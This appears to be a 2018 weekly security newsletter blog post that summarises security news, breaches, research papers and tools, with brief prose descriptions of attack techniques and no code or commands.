Security Stack Sheet #10

Word of the week “Public by default”

Links HERE and HERE and HERE and HERE and HERE and Incident HERE


Word of the week special “Why not HTTPS”

Links HERE and HERE Get free HTTPS from HERE




Great list of InfoSec people to follow on Twitter HERE




Crypto challenge of the week

-Reminder: the cryptopals crypto challenges

Set 1: Basics

Set 2: Block crypto

Set 3: Block & stream crypto

Set 4: Stream crypto and randomness

Set 5: Diffie-Hellman and friends

Set 6: RSA and DSA

Set 7: Hashes

Set 8: Abstract Algebra




May 25: GDPR Live! See incidents section below – Worst breaches in 2018 so far HERE

June 30: TLS1.1 mandatory for PCI-DSS compliance  BEWARE!


Now: TLS1.2 mandatory for proper security

Now: HTTPS mandatory

July and August – Holidays!!

July 27 – Mars approach and liquid water on Mars HERE

March 29 2019: Brexit

Sept 2019: PSD2 security mandatory


Comic of the week


Some OWASP stuff first

-Top 10 Web Hacking Techniques of 2017 – Nominations Open

Every year, numerous security researchers choose to share their findings with the community through conference presentations, blog posts, whitepapers, videos, and even simple disclosures


-MyCrypto’s Security Guide For Dummies And Smart People Too

An in-depth guide on how to be safe in the crypto world and the online world in general


-OWASP Europe in London – Presentations coming soon!




Incidents in the world last week

Other source HERE Find your country

Map of Threat Actors HERE Trends for threats HERE Insider threats? HERE

Are weak login credentials allowing criminals to bypass your security? 

A study by cyber security firm McAfee has found that criminal marketplaces on the dark web are selling Remote Desktop Protocol (RDP) access for as little as $3 and, in some instances, offering up to 40,000 separate RDP connections. These RDP accesses are said to include government departments and the security system of a major international airport

Spanish telecoms provider Telefonica suffers security breach 

According to media reports, Spanish telecoms provider Telefónica, has suffered the largest data breach in Spanish telecommunications history

The threat from the inside 

Several attempted data theft incidents in recent weeks have highlighted the significant insider threat to businesses developing high-value intellectual property. These incidents had the potential to introduce a potentially catastrophic financial and or reputational impact on the company:

  • A disgruntled Tesla employee reportedly stole a large volume of sensitive data from company servers, allegedly passed the details on to an unknown third party after being refused promotion within the company
  • A former Apple employee was reportedly arrested after stealing data related to the company’s research and development of self-driving cars. Suspicious activity on the employee’s user accounts during the last few days of his employment sparked an investigation into his activities, revealing the theft of Apple trade secrets relating to autonomous vehicles
  • Israeli security company, NSO, reportedly discovered an employee had stolen proprietary surveillance software from the company and offered it on the dark web. A potential buyer of the stolen surveillance software informed NSO of the theft



Global ALERT level

BLUE or GUARDED indicates a general risk of increased hacking, virus, or other malicious activity. The potential exists for malicious cyber activities, but no known exploits have been identified, or known exploits have been identified but no significant impact has occurred.

Incidents detail

XSS on

Etherscan is ranked as the 1,379th site in the world according to Alexa, so they’re pretty big!


From today July 24th, Google Chrome starts marking all non-HTTPS sites ‘Not Secure’

Starting today with the release of Chrome 68, Google Chrome prominently marks all non-HTTPS websites as ‘Not Secure’ in its years-long effort to make the web a more secure place for Internet users


Request for Packets: Port 15454

Starting 12-JUL-2018 the number of DShield participants reporting probes for port 15454 started to rise


Evading CSP with DOM-based dangling markup

Dangling markup is a technique to steal the contents of the page without script by using resources such as images to send the data to a remote location that an attacker controls. It is useful when reflected XSS doesn’t work or is blocked by Content Security Policy (CSP). The idea is you inject some partial HTML that is in an unfinished state such as a src attribute of an image tag, and the rest of the markup on the page closes the attribute but also sends the data in-between to the remote server


Attackers concealing malware in images uploaded to Google servers

Cybercriminals are putting a new spin on the old trick of hiding malware code in Exchangeable Image File Format (EXIF) data. Recently, attackers were observed using this technique in image files, rather than text files, and uploading them to servers


Titan Security Keys – Google launches its own USB-based FIDO U2F Keys


Open AWS S3 bucket at political robocall firm exposes 2,600 files

An open AWS S3 bucket at a political autodial company exposed nearly 2,600 files relating to a number of political campaigns in the U.S. and was indexed by GrayhatWarfare, a database of 48,623 open S3 buckets


.NET Process Injection

For a while now, I have been saying that PowerShell is dead in high security environments. Yes, it still works in environments where they haven’t figured out how to monitor PowerShell or at least process creation commands and arguments, but as soon as a defensive team implements visibility into this space, defense (the blue team) has all the advantages over an adversary playing in this space


New Bluetooth Hack Affects Millions of Devices from Major Vendors

The security vulnerability is related to two Bluetooth features—Bluetooth low energy (LE) implementations of Secure Connections Pairing in operating system software, and BR/EDR implementations of Secure Simple Pairing in device firmware

Links HERE and HERE
Instagram is building non-SMS 2-factor auth to thwart SIM hackers


Singapore’s Largest Healthcare Group Hacked, 1.5 Million Patient Records Stolen


Facebook has suspended data analytics firm Crimson Hexagon over concerns that the company has been misusing Facebook’s data


Spectre Returns! Speculation Attacks using the Return Stack Buffer

The recent Spectre attacks exploit speculative execution, a pervasively used feature of modern microprocessors, to allow the exfiltration of sensitive data across protection boundaries. In this paper, we introduce a new Spectreclass attack that we call SpectreRSB. In particular, rather than exploiting the branch predictor unit, SpectreRSB exploits the return stack buffer (RSB), a common predictor structure in modern CPUs used to predict return addresses



Research of the week

-Hardware and firmware attacks: Defending, detecting, and responding – by Facebook

  • The attack landscape for firmware is maturing and needs more attention from defense and detection communities. Recent examples of firmware attacks include the Equation Group’s attacks on drive firmware, Hacking Team’s commercialized EFI RAT, Flame, and Duqu.
  • Simple tools like osquery give defenders important insights about what’s happening on their network so they can quickly detect a potential compromise. Facebook released osquery as an open source project in 2014.
  • Facebook recently added hardware monitoringto osquery, which already aids security teams in vulnerability management, incident response, OS X attacks, and IT compliance


-ERP Applications Under Fire How cyberattackers target the crown jewels – thanks to Gustavo

Key Findings

  • Hacktivist groups are actively attacking ERP applications to disrupt critical business operations and penetrate target organizations.
  • Cybercriminals have evolved malware to target internal, “behind-the-firewall” ERP applications.
  • Nation-state sponsored actors have targeted ERP applications for cyber espionage and sabotage.
  • There has been a dramatic increase in the interest in exploits for SAP applications, including SAP HANA, in dark web and cybercriminal forums.
  • Attacks vectors are evolving, still mainly leveraging known ERP vulnerabilities vs. zero-days.
  • Cloud, mobile and digital transformations are rapidly expanding the ERP attack surface, and threat actors are taking advantage.
  • Leaked information by third parties and employees can expose internal ERP applications.


-Credential Spill Report 2018

Read the Conclusion!

Link HERE Password spraying by NCSC HERE

-Developing the UK cyber security profession

Link HERE Negotiate your salary HERE

-A Look at Java Cryptography

A discussion of some key concepts from the Java Cryptographic Architecture (JCA) API that developers can use to add encryption to their Java-based applications


-Push Away Your Privacy: Precise User Tracking Based on TLS Client Certificate Authentication

The design and implementation of cryptographic systems offer many subtle pitfalls. One such pitfall is that cryptography may create unique identifiers potentially usable to repeatedly and precisely re-identify and hence track users. This work investigates TLS Client Certificate Authentication (CCA), which currently transmits certificates in plain text. We demonstrate CCA’s impact on client traceability using Apple’s Apple Push Notification service (APNs) as an example. APNs is used by all Apple products, employs plain-text CCA, and aims to be constantly connected to its backend. Its novel combination of large device count, constant connections, device proximity to users and unique client certificates provides for precise client traceability. We show that passive eavesdropping allows to precisely re-identify and track users and that only ten interception points are required to track more than 80 percent of APNs users due to global routing characteristics. We conduct our work under strong ethical guidelines, responsibly disclose our findings, and can confirm a working patch by Apple for the highlighted issue. We aim for this work to provide the necessary factual and quantified evidence about negative implications of plain-text CCA to boost deployment of encrypted CCA as in TLS 1.3



Tool of the week

-AddressSanitizer (or ASan)

An open source programming tool by Google that detects memory corruption bugs such as buffer overflows or accesses to a dangling pointer (use-after-free)


-BYOB (Build Your Own Botnet) – thanks to Naz

BYOB is an open-source project that provides a framework for security researchers and developers to build and operate a basic botnet to deepen their understanding of the sophisticated malware that infects millions of devices every year and spawns modern botnets, in order to improve their ability to develop counter-measures against these threats

Link HERE and Attack of the Bot army HERE

-Gargoyle: Innovative solution for preventing insider attacks

Dubbed Gargoyle, the solution:

  • Evaluates the trustworthiness of an access request context through a set of Network Context Attributes (NCAs) that are extracted from the network traffic
  • Leverages the capabilities of Software-Defined Network (SDN) for both policy enforcement and implementation
  • Takes advantage of the network controller for added protection/defense
  • Avoids a binary approach when making authorizations. Instead, depending on the context, some functions (e.g., copy, email) may be disallowed for the data requester

Link HERE Paper HERE

-Two Factor Auth List – thanks to Neil

List of sites with Two Factor Auth support which includes SMS, email, phone calls, hardware, and software


-Updated: Amass – In-Depth DNS Enumeration written in Go


-Advanced for Pentesters: House: A Mobile Analysis Platform Built on Frida

House is an open source web application that simplifies the testing process with Frida. With House, security researchers can easily generate Frida scripts to perform various tasks including enumeration, function hooking and intercepting. It also provides an easy-to-use web UI for researchers to generate, customize, and manage their Frida scripts


-Updated: DOMPurify

DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify works with a secure default, but offers a lot of configurability and hooks

Link HERE Preso – How to protect web apps using Javascript HERE


Other interesting articles

Zero login: Fixing the flaws in authentication

The truth is clear. We are moving into a post-password zero-login age, with new biometric technologies and other PII innovations helping to secure a fast, easy, frictionless personalised experience for every single application we need to access on a daily basis

Link HERE Others HERE


The Most Common Vulnerability Of All

Rethinking Email for Privacy and Security



5 ways to find and fix open source vulnerabilities

recent discovery of surreptitious execution of cryptomining code by a sandboxed app, riding piggyback on the open source software (OSS) ecosystem, raises pertinent questions about the security of open source code and its dependencies



Data regulations and privacy discussions are still in the early stage

GDPR is just the starting point

Privacy by design

Link HERE and California Privacy Law 2018 HERE


And finally, the Engineer’s guide to the future

Augmented Reality (AR), also known as Mixed Reality (MR) or even more trendily, Extended Reality (XR), is approaching blockchain levels of hype.

With the advent of ARKit and ARCore, augmented reality apps are now a lot easier to make. There are a lot of people trying to sell them as amazingly groundbreaking, with the ability to change retail, health, finance, whatever

If it can be automated to save money or make money, it will be automated.

Here’s some varied, and potentially crazy, thoughts on what else could happen to impact us:

  • Quantum Computing — I could have spent more time on this, but don’t know enough about it yet to be knowledgeable. Basically, quantum computing could be capable of carrying out calculations heretofore impossible and also do things we may not like as much, such as breaking all known encryptions algorithms. This field is likely to be huge, and focusing your efforts here would probably not be a bad career move.
  • Driverless cars will replace mosts cars. And they won’t be called ‘cars’ (we don’t call cars horseless carriages, and we won’t call cars that move themselves, cars). See my post here ‘Your Grandkids won’t need to know how to drive’. These “cars” will be basically massive computers, with screens, voice interfaces and more, so there will be so much potential for engineers to get involved.
  • Ageing could be extended dramatically, most likely for the super-rich. If you’re a billionaire right now, you’re most likely investing in a remote hideaway in case civilisation falls, or doing research into life-extending technology. More to read on this hereand here.
  • The population could explode as major illnesses like cancer and heart disease are prevented / cured, along with road-accidents being eliminated by those driverless cars.
  • The population could be significantly reduced by a pandemic or other disaster.
  • Clean, free energy could be created, either by Nuclear Fusion (read more here) or some new breakthrough. What changes would next-to-free electricity do for industry, and for consumers?
  • The Space Industry could grow massively — think asteroid mining or tourist trips to the moon. Bored of programming APIs? Why not help program a probe to mine ore on asteroids?
  • War at a scale not seen since the 20th Century.
  • Nano-technology — micro-robotics that could be used for innumerable things — medicine, manufacturing, military, security and much more. And fighting crime

Link HERE and a Place for Secrets HERE



AppSec Ezine

Link HERE and credits to HERE

Leave a Reply

Your email address will not be published. Required fields are marked *